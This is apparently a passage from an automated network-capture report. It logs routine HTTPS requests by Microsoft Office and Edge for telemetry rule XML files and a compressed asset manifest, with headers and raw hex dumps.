                                                                                                                                                                                                        2024-12-04 12:53:30 UTC16384INData Raw: c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97
                                                                                                                                                                                                        Data Ascii: q*b,0Rte*|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;|a``|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:
                                                                                                                                                                                                        2024-12-04 12:53:30 UTC16384INData Raw: c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b
                                                                                                                                                                                                        Data Ascii: Rg|M kt|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX*$Nkct&iZ%b8Zoj@ u2OgA1DG3*5d*lg|9GV>OVzVMPA76.|crkX
                                                                                                                                                                                                        2024-12-04 12:53:30 UTC16384INData Raw: 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc
                                                                                                                                                                                                        Data Ascii: AHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;
                                                                                                                                                                                                        2024-12-04 12:53:30 UTC5247INData Raw: 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e
                                                                                                                                                                                                        Data Ascii: *'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        49192.168.2.74977313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:31 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                        x-ms-request-id: 7eb0f396-d01e-0066-0ac6-45ea17000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125331Z-1746fd949bd9x4mhhC1EWRb76n000000017g000000008na3
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        50192.168.2.74977413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:31 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                        x-ms-request-id: 4ebe80de-801e-0047-51c8-457265000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125331Z-1746fd949bdlnsqphC1EWRurw000000000yg00000000bv8m
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        51192.168.2.74977213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:31 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 478
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                        x-ms-request-id: 9009c19b-701e-0053-74c6-453a0a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125331Z-1746fd949bd6ztf6hC1EWRvq2s00000000vg000000007fr7
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        52192.168.2.74977513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:31 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 400
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                        x-ms-request-id: 00b51f18-a01e-000d-6fcc-45d1ea000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125331Z-1746fd949bdjrnwqhC1EWRpg28000000016g00000000atzg
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:31 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        53192.168.2.74977713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:32 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:32 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                        x-ms-request-id: 46349be7-d01e-0017-71d1-45b035000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125332Z-1746fd949bdwt8wrhC1EWRu6rg000000018g00000000bnyw
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:32 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        54192.168.2.74977813.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:32 UTC470OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Edge-Asset-Group: Shoreline
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:32 UTC556INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:32 GMT
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Content-Length: 306698
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                                                                                                                                        ETag: 0x8DBC9B5C40EBFF4
                                                                                                                                                                                                        x-ms-request-id: 2c1956a5-f01e-0014-1cdc-45ab63000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125332Z-1746fd949bdw2rg8hC1EWR11u400000001m0000000001ny6
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:32 UTC15828INData Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe
                                                                                                                                                                                                        Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&|'J'~eL|&c~6{JAw^z3cUEeMaTu W/^~b|X_?r~vXwW
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC16384INData Raw: 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c 87 07 e7 d4 da 16 34 27 65 eb d7 87 be 44 96 29 71 b2 3a d6 6b
                                                                                                                                                                                                        Data Ascii: [T[%6Q+"PR6mU5YgV-HoB /!~qL|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz|PVM&UOu~{-oM5QafAp4'eD)q:k
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC16384INData Raw: 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d d9 e8 78 24 ab 24 51 69 66 82 d7 44 e8 1d cf c8 e2 16 60 37 02
                                                                                                                                                                                                        Data Ascii: kD$>U|}mlBxz*BFSzP~|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)|[U35QTB-x$$QifD`7
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC16384INData Raw: b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 6e 30 91 49 05 4e 42 60 22 53 9e 67 6f 08 ac 30 cf 05 cd b5 f5
